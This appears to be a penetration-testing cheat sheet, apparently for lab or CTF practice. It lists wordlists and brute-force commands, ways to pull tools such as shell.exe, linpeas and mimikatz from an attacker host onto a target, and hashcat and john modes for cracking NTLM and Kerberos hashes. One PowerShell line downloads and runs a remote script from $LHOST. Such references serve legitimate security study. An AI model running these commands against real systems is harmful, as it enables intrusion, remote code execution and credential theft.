Quick Reference
Wordlists, file transfer methods, and hash cracking cheat sheet.
WORDLISTS
Directory brute forcing
Go-to wordlist for gobuster, feroxbuster, ffuf — 220k entries
gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Password cracking
Standard password wordlist — 14 million entries
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
Alternative directory list
Catches paths that dirbuster misses — 30k entries
gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
Subdomain / vhost scanning
Top subdomains for vhost discovery — 5k entries
gobuster vhost -u http://domain.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster dns -d domain.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Username enumeration
Common first names as usernames — 10k entries
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t $IP
hydra -L /usr/share/seclists/Usernames/Names/names.txt -p 'Password1' $IP ssh
SNMP community strings
Brute force SNMP community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt $IP
Install SecLists
Massive collection of wordlists — Discovery, Fuzzing, Passwords, Usernames
sudo apt install seclists -y
ls /usr/share/seclists/
FILE TRANSFER METHODS
Host files on attacker (HTTP)
Start a web server in your current directory — Most common transfer method
python3 -m http.server 80
Download to Linux target
wget or curl — Try both if one isn't available
wget http://$LHOST/linpeas.sh -O /tmp/linpeas.sh
curl http://$LHOST/chisel -o /tmp/chisel
Download to Windows target (certutil)
Built into every Windows version — Rarely blocked
certutil -urlcache -split -f http://$LHOST/shell.exe C:\Temp\shell.exe
Download to Windows target (PowerShell)
Multiple methods — Try next one if blocked
Invoke-WebRequest -Uri http://$LHOST/shell.exe -OutFile C:\Temp\shell.exe
(New-Object Net.WebClient).DownloadFile('http://$LHOST/shell.exe','C:\Temp\shell.exe')
IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/shell.ps1')
Host files on attacker (SMB)
When HTTP is blocked on target — Works great for Windows
# On attacker:
impacket-smbserver share . -smb2support
# On Windows target:
copy \\$LHOST\share\mimikatz.exe C:\Temp\
Netcat file transfer
Raw TCP — When nothing else works
# On attacker (send):
nc -nlvp 4444 < linpeas.sh
# On target (receive):
nc $LHOST 4444 > /tmp/linpeas.sh
Base64 encode/decode
Copy-paste through the terminal — When all transfers are blocked
# On attacker (encode):
base64 -w 0 file.bin
# On target (decode):
echo 'BASE64STRING' | base64 -d > file.bin
HASH CRACKING
Identify hash type
Always identify before cracking — Determines hashcat mode
hashid '$6$rounds=5000$salt$hash'
hash-identifier
Common Hash Formats
MD5: 32 hex chars → hashcat -m 0
SHA1: 40 hex chars → hashcat -m 100
SHA256: 64 hex chars → hashcat -m 1400
SHA512: 128 hex chars → hashcat -m 1800 (if $6$ prefix)
NTLM: 32 hex chars (no salt) → hashcat -m 1000
NTLMv2: user::domain:challenge... → hashcat -m 5600
bcrypt: $2a$ or $2y$ prefix → hashcat -m 3200
Kerberoast: $krb5tgs$23$*... → hashcat -m 13100
AS-REP: $krb5asrep$23$... → hashcat -m 18200
md5crypt: $1$ prefix → hashcat -m 500
sha512crypt:$6$ prefix → hashcat -m 1800
John the Ripper
Auto-detects hash type — Good general purpose cracker
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
Hashcat — MD5
Mode 0 — Fastest hash to crack
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat — SHA256
Mode 1400
hashcat -m 1400 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat — NTLM
Mode 1000 — Windows local password hashes, very fast
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat — NTLMv2
Mode 5600 — Captured from Responder or network sniffing
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat — bcrypt
Mode 3200 — Very slow, use rules instead of full wordlist
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
Hashcat — Kerberoast (TGS-REP)
Mode 13100 — Cracking Kerberoasted service account hashes
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat — AS-REP Roast
Mode 18200 — Cracking AS-REP hashes from accounts without pre-auth
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
Online hash lookup
Instant results for common hashes — Only for non-sensitive/CTF hashes
# Paste hash at:
# https://crackstation.net/
# https://hashes.com/en/decrypt/hash